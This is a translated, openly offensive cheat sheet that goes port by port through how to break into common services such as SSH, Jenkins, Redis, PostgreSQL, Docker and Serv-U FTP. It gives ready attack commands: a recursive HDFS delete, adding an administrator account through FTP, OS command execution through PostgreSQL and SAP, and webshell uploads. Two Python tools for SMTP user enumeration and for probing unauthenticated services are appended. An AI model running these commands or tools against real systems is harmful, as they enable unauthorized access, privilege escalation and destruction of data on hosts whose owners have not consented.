
Common port penetration records

  • I didn't write this; I saw it shared among friends, thought it was good, and quickly recorded it
  • We don't do penetration; we're just the penetration porters
  • When facing a target host, we often use port scanning to learn which ports and services are open. When you see a port number, can you guess what service it is, and what security vulnerabilities and exploitation techniques it may expose?
  • Today I'm sharing some common port services and their vulnerabilities to help you quickly find an attack path to obtain host privileges

1. Remote management ports

Port 22 (SSH)

Security vulnerabilities: weak passwords, brute-force guessing, username enumeration
 Exploitation method: 1. Username enumeration tells you whether a given account exists on the target host. 2. Weak passwords or brute-force cracking yield a login on the target host.

Port 23 (Telnet)

Security vulnerabilities: weak passwords, plaintext transmission
 Exploitation method: 1. Obtain access to the target host through weak passwords or brute-force cracking. 2. Sniff the connection and capture the Telnet username and password, which are sent in plaintext.

Port 3389 (RDP)

Security vulnerabilities: brute-force cracking
 Exploitation method: obtain access to the target host through weak passwords or brute-force cracking.

Port 5632 (pcAnywhere)

Security vulnerabilities: weak passwords, brute-force cracking
 Exploitation method: obtain access to the target host through weak passwords or brute-force cracking.

Port 5900 (VNC)

Security vulnerabilities: weak passwords, brute-force cracking
 Exploitation method: obtain access to the target host through weak passwords or brute-force cracking.

2. Web middleware/service ports

Ports 1090/1099 (RMI)

Security vulnerability: Java RMI deserialization leading to remote command execution
 Detection method: use nmap to identify the service; the port is reported as
 1099/1090 java-rmi Java RMI Registry

Port 7001 (WebLogic)

Security vulnerabilities: weak passwords, SSRF, deserialization vulnerabilities
 Exploitation methods: 1. Log in to the console with weak credentials and deploy a WAR package. 2. Use the SSRF to probe the intranet. 3. Deserialization leading to remote code execution, etc.

Port 8000 (JDWP)

Security vulnerability: JDWP remote command execution (the debug port accepts any client without authentication)
 Port information: 8000 jdwp Java Debug Wire Protocol
 Detection tool: /IOActive/jdwp-shellifier

Port 8080 (Tomcat)

Security vulnerabilities: weak passwords, sample directories
 Exploitation method: log in to the manager console with a weak password and upload a WAR package.

Port 8080 (JBoss)

Security vulnerabilities: unauthorized access, deserialization
 Exploitation methods: 1. Unauthorized access to the console allows remote deployment of arbitrary applications. 2. Deserialization leading to remote command execution, etc.
 Detection tool: /joaomatosf/jexboss

Port 8080 (Jetty)

Security vulnerability: remote shared buffer leak (JetLeak)
 Exploitation method: by carefully constructing a header value, the attacker triggers a parsing exception whose error message is read out of the shared buffer, which still contains requests submitted earlier by other users. The server returns buffer contents at an offset the attacker controls through the payload.
 Testing tool: /GDSSecurity/Jetleak-Testing-Script

Port 8080 (GlassFish)

Security vulnerabilities: weak passwords, arbitrary file read
 Exploitation method: 1. Log in with the weak default credentials admin/admin and deploy a shell directly. 2. Read arbitrary files to obtain sensitive server configuration.

Port 8080 (Jenkins)

Security vulnerabilities: unauthorized access, remote code execution
 Exploitation method: if the following URLs are reachable without authentication, the script console executes arbitrary Groovy, which can spawn a reverse shell, write a webshell, etc.
 http://<target>:8080/manage
 http://<target>:8080/script

Port 8161 (ActiveMQ)

Security vulnerabilities: weak passwords, arbitrary file write, deserialization
 Exploitation method: log in to the web console with the default credentials admin/admin, then use the file write to drop a webshell, plant an SSH key, etc.

Port 9043 (WebSphere)

Security vulnerabilities: console weak passwords, remote code execution
 Console address: https://<target>:9043/ibm/console/

Port 50000 (SAP)

Security vulnerability: remote code execution
 Exploitation method: the attacker constructs a URL request to the management servlet that executes an operating-system command
 PoC: http://<target>:50000/ctc/servlet/?param=;EXECUTE_CMD;CMDLINE= /c ipconfig /all

Port 50070 (Hadoop)

Security vulnerability: unauthorized access
 Exploitation method: through the WebHDFS REST API an attacker can operate on data in any directory without credentials, including deletion
 curl -i -X DELETE "http://<target>:50070/webhdfs/v1/tmp?op=DELETE&recursive=true"
 curl -i -X PUT "http://<target>:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS"

3. Database ports

Port 389 (LDAP)

Security vulnerabilities: unauthorized (anonymous) access, weak passwords
 Exploitation method: connect directly with an LDAP browser tool such as LdapBrowser and read the directory

Port 1433 (MSSQL)

Security vulnerabilities: weak passwords, brute-force cracking
 Exploitation method: write a webshell via differential backup, escalate to operating-system privileges through the sa account, etc.

Port 1521 (Oracle)

Security vulnerabilities: weak passwords, brute-force cracking
 Exploitation method: gain access through weak passwords or brute-force cracking

Port 3306 (MySQL)

Security vulnerabilities: weak passwords, brute-force cracking
 Exploitation method: write a webshell through the query log file, privilege escalation via UDF, privilege escalation via MOF, etc.

Port 5432 (PostgreSQL)

Security vulnerabilities: weak passwords, command execution with high privileges
 Exploitation method: the attacker obtains credentials through weak passwords, connects to postgres and, as a superuser (or a member of pg_execute_server_program on PostgreSQL 11+), executes system commands through COPY ... FROM PROGRAM
 PoC reference:
 DROP TABLE IF EXISTS cmd_exec;
 CREATE TABLE cmd_exec(cmd_output text);
 COPY cmd_exec FROM PROGRAM 'id';
 SELECT * FROM cmd_exec;

Port 5984 (CouchDB)

Security vulnerabilities: vertical privilege escalation, arbitrary command execution
 Exploitation method: create an administrator user by submitting crafted user data, log in as that user, then send a crafted request that triggers arbitrary command execution
 Console: http://<target>:5984/_utils

Port 6379 (Redis)

Security vulnerability: unauthorized access
 Exploitation method: write a webshell to a known absolute web path, write a cron job that executes a reverse shell, write an SSH public key into authorized_keys to obtain root, master-slave replication RCE, etc.

Port 9200 (Elasticsearch)

Security vulnerabilities: unauthorized access, command execution
 Test method:
 1. Access the following URLs directly to obtain sensitive information:
 http://<target>:9200/_nodes    view node data
 http://<target>:9200/_river    view river (data-sync) configuration, which can include database credentials
 2. Execute arbitrary commands by constructing a specific request (script execution in vulnerable versions)

Port 11211 (Memcached)

Security vulnerability: unauthorized access
 Detection method: no username or password is required; connect directly to port 11211 of the memcached service and issue commands.
 nc -vv <target> 11211

Port 27017 (MongoDB)

Security vulnerabilities: unauthorized access, weak passwords
 Exploitation method: unauthorized access or weak passwords allow a remote connection to the database, leading to leakage of sensitive information

4. Common protocol ports

Port 21 (FTP)

Security vulnerabilities: 1. Improper configuration 2. Plaintext transmission 3. Privilege escalation through third-party software
 Exploitation method:
 1. Anonymous login or weak passwords
 2. Sniff the FTP username and password
 3. A Serv-U account with elevated permissions can execute system commands. Privilege escalation commands, first adding a system user:
    quote site exec net user 4567 4567 /add
 then promoting it to administrator:
    quote site exec net localgroup administrators 4567 /add

Port 25 (SMTP)

Attack methods: 1. Anonymous mail relay 2. Weak passwords 3. SMTP user enumeration
 Exploitation method:
 1. The SMTP server is misconfigured as an open relay, so an attacker can send mail as any user.
 2. Scan for SMTP weak passwords, obtain account credentials and send phishing mail.
 3. Obtain usernames through SMTP user enumeration (VRFY/EXPN/RCPT TO): nmap -p 25 --script=smtp-enum-users <target>
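The VRFY-then-RCPT logic that smtp-enum-users automates, as an added Python example (not code from the original post). The server transcript inside demo() is constructed, and the host, domain and user list are placeholders; enumerate_users takes any object with sendall/recv, so the same function runs unchanged against a real socket.

```python
import socket


def read_reply(conn):
    """Read one SMTP reply, including multi-line replies such as the EHLO
    response, and return (code, full_text)."""
    data = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        data += chunk
        lines = data.decode("latin-1").split("\r\n")
        # The last line of a reply is "NNN text"; continuation lines are "NNN-text".
        last = lines[-2] if len(lines) >= 2 else ""
        if len(last) == 3 or (len(last) > 3 and last[3] == " "):
            return int(last[:3]), "\r\n".join(lines[:-1])


def command(conn, line):
    conn.sendall((line + "\r\n").encode("ascii"))
    return read_reply(conn)


def verdict(code):
    """Map a reply code to True (mailbox exists), False (rejected) or
    None (the server will not say, e.g. 252 or VRFY disabled)."""
    if code in (250, 251):
        return True
    if code in (550, 551, 553):
        return False
    return None


def enumerate_users(conn, users, domain, helo_name="probe.example.com",
                    sender="probe@example.com"):
    """VRFY each user; for users the server refuses to confirm, fall back to
    RCPT TO after checking that the server is not a catch-all."""
    read_reply(conn)                                   # 220 banner
    command(conn, f"EHLO {helo_name}")
    results = {u: verdict(command(conn, f"VRFY {u}")[0]) for u in users}
    undecided = [u for u, v in results.items() if v is None]
    if undecided:
        command(conn, f"MAIL FROM:<{sender}>")
        # A name that cannot exist: if it is accepted, the server accepts
        # every recipient and RCPT TO carries no information.
        sentinel = command(conn, f"RCPT TO:<zqxj-nobody-7f3a@{domain}>")[0]
        if verdict(sentinel) is False:
            for u in undecided:
                results[u] = verdict(command(conn, f"RCPT TO:<{u}@{domain}>")[0])
        command(conn, "RSET")
    command(conn, "QUIT")
    return results


class ScriptedConnection:
    """Stand-in for a socket that replays a constructed server transcript."""
    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = []

    def sendall(self, data):
        self.sent.append(data)

    def recv(self, _n):
        return self.replies.pop(0) if self.replies else b""


def demo():
    """Constructed exchange: VRFY answers for root and nobody but is refused
    for bob (252), so bob is resolved through RCPT TO."""
    conn = ScriptedConnection([
        b"220 mail.example.com ESMTP\r\n",
        b"250-mail.example.com\r\n250-PIPELINING\r\n250 8BITMIME\r\n",
        b"250 root <root@example.com>\r\n",             # VRFY root
        b"550 5.1.1 nobody... User unknown\r\n",        # VRFY nobody
        b"252 2.5.2 Cannot VRFY user\r\n",              # VRFY bob
        b"250 2.1.0 Ok\r\n",                            # MAIL FROM
        b"550 5.1.1 Recipient address rejected\r\n",    # RCPT sentinel
        b"250 2.1.5 Ok\r\n",                            # RCPT bob
        b"250 2.0.0 Ok\r\n",                            # RSET
        b"221 2.0.0 Bye\r\n",                           # QUIT
    ])
    return enumerate_users(conn, ["root", "nobody", "bob"], "example.com")


def enumerate_remote(host, users, domain, port=25, timeout=10.0):
    """Run the same logic against a live server (placeholder host)."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.settimeout(timeout)
        return enumerate_users(conn, users, domain)


if __name__ == "__main__":
    print(demo())
```

A 252 reply is the common false-negative trap: the server is not rejecting the user, it is refusing to say, and only the RCPT TO fallback (guarded by the sentinel so a catch-all domain is not misread as "everyone exists") turns that into an answer.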

Port 53 (DNS)

Security vulnerabilities: 1. DNS zone transfer (AXFR) 2. DNS spoofing 3. DNS cache poisoning
 Test method:
 1. DNS zone transfer: use nslookup on Windows and dig on Linux to request an AXFR from the target server; if the transfer succeeds, every record in the zone is listed.
 2. DNS spoofing: the attacker impersonates the authoritative name server and answers queries with false records.
 3. DNS cache poisoning: the attacker tricks a recursive DNS server into accepting forged responses as authentic and caching them.

Port 161 (SNMP)

Security vulnerability: default community string/weak password access
 Exploitation method: the audit scripts bundled with nmap may leak sensitive information
 1. Weak community string detection: nmap -sU -p161 --script=snmp-brute <target>
 2. Obtain system information: nmap -sU -p161 --script=snmp-sysdescr <target>
 3. Obtain user information: nmap -sU -p161 --script=snmp-win32-users <target>
 4. Get network port status: nmap -sU -p161 --script=snmp-netstat <target>

Port 443 (SSL)

Security vulnerability: OpenSSL Heartbleed
 Exploitation method: an attacker can remotely read up to 64 KB of process memory per heartbeat request from a server running a vulnerable OpenSSL version
 Scan script: nmap -sV --script=ssl-heartbleed <target>

Port 445 (SMB)

Security vulnerabilities: information leakage, remote code execution
 Exploitation method: sensitive information can be obtained from shares; buffer overflows lead to remote code execution, e.g. MS17-010

Port 873 (Rsync)

Security vulnerabilities: anonymous access, weak passwords
 Exploitation method: attackers can list modules and download/upload files, or attempt to upload a webshell
 1. Download: rsync -avz <target>::path/file local/path/filename
 2. Upload: rsync -avz local/path/filename <target>::path/file

Port 2181 (Zookeeper)

Security vulnerability: unauthorized access
 Detection method: attackers can obtain a large amount of sensitive system information by issuing the envi command, including the host name and Java environment
 echo envi | nc <target> 2181

Port 2375 (Docker)

Security vulnerability: unauthorized access
 Detection method: execute Docker commands through the docker daemon API
 # List container information, equivalent to docker ps -a
  curl http://<target>:2375/containers/json
  docker -H tcp://<target>:2375 start <Container Id>
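One probe routine covering the services listed above whose very first reply shows whether they answer without credentials: the plaintext and binary protocols (RMI on 1090/1099, JDWP on 8000, Redis on 6379, Memcached on 11211, Zookeeper on 2181) and the HTTP APIs of Docker on 2375, Elasticsearch on 9200 and Hadoop WebHDFS on 50070. Added Python example, not code from the original post; the sample responses in the tests are constructed and the host is a placeholder. classify is pure so it can be checked offline; probe performs the network exchange.

```python
import socket

# Minimal request each service expects, keyed by service name. Raw HTTP/1.0 is
# used for the REST APIs so a single socket code path serves every probe.
PROBES = {
    "rmi":           b"JRMI\x00\x02\x4b",   # JRMP magic, version 2, StreamProtocol
    "jdwp":          b"JDWP-Handshake",     # debugger handshake, echoed back verbatim
    "redis":         b"PING\r\n",           # inline RESP; +PONG means no AUTH enforced
    "memcached":     b"stats\r\n",          # text protocol has no authentication at all
    "zookeeper":     b"envi\r\n",           # four-letter word dumping the JVM environment
    "docker":        b"GET /containers/json HTTP/1.0\r\n\r\n",
    "elasticsearch": b"GET /_nodes HTTP/1.0\r\n\r\n",
    "hadoop":        b"GET /webhdfs/v1/?op=LISTSTATUS HTTP/1.0\r\n\r\n",
}

HTTP_SERVICES = ("docker", "elasticsearch", "hadoop")


def http_status(response):
    """Status code of a raw HTTP response, or None if it is not HTTP."""
    first = response.split(b"\r\n", 1)[0].split()
    if len(first) >= 2 and first[0].startswith(b"HTTP/") and first[1].isdigit():
        return int(first[1])
    return None


def http_body(response):
    return response.split(b"\r\n\r\n", 1)[1] if b"\r\n\r\n" in response else b""


def classify(service, response):
    """Reduce a service's first reply to 'open' (it served the request with no
    credentials), 'restricted' (it demanded authentication or refused the
    command) or 'unknown' (no or unrecognised reply)."""
    if not response:
        return "unknown"
    if service == "rmi":
        # 0x4e = ProtocolAck: the registry accepts JRMP calls from us
        return "open" if response[:1] == b"\x4e" else "unknown"
    if service == "jdwp":
        return "open" if response.startswith(b"JDWP-Handshake") else "unknown"
    if service == "redis":
        if response.startswith(b"+PONG"):
            return "open"
        if response.startswith((b"-NOAUTH", b"-DENIED")):   # requirepass / protected mode
            return "restricted"
        return "unknown"
    if service == "memcached":
        return "open" if response.startswith(b"STAT ") else "unknown"
    if service == "zookeeper":
        if response.startswith(b"Environment:"):
            return "open"
        if b"not in the whitelist" in response:             # 4lw.commands.whitelist in effect
            return "restricted"
        return "unknown"
    if service in HTTP_SERVICES:
        status = http_status(response)
        if status == 200 and http_body(response).lstrip()[:1] in (b"{", b"["):
            return "open"
        if status in (401, 403):
            return "restricted"
        return "unknown"
    raise ValueError(f"no probe defined for {service!r}")


def probe(host, port, service, timeout=3.0):
    """Send the service's probe to host:port and classify what comes back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(PROBES[service])
            response = b""
            while len(response) < 4096:
                try:
                    chunk = s.recv(4096)
                except socket.timeout:
                    break
                if not chunk:
                    break
                response += chunk
                s.settimeout(0.5)        # the rest of the reply, if any, follows quickly
    except OSError:
        return "unknown"
    return classify(service, response)


if __name__ == "__main__":
    # Placeholder target and the ports from the sections above.
    for service, port in [("rmi", 1099), ("jdwp", 8000), ("redis", 6379),
                          ("memcached", 11211), ("zookeeper", 2181), ("docker", 2375),
                          ("elasticsearch", 9200), ("hadoop", 50070)]:
        print(f"{service:14s} {port:6d} {probe('target.example.com', port, service)}")
```

For RMI and JDWP an "open" verdict only means the endpoint talks the protocol to an unauthenticated peer; neither protocol has an authentication step, so the next move is the deserialization or debugger tooling named in their sections. For Redis and Zookeeper the "restricted" branch tells the operator which mitigation (requirepass/protected mode, or the four-letter-word whitelist) is already in place.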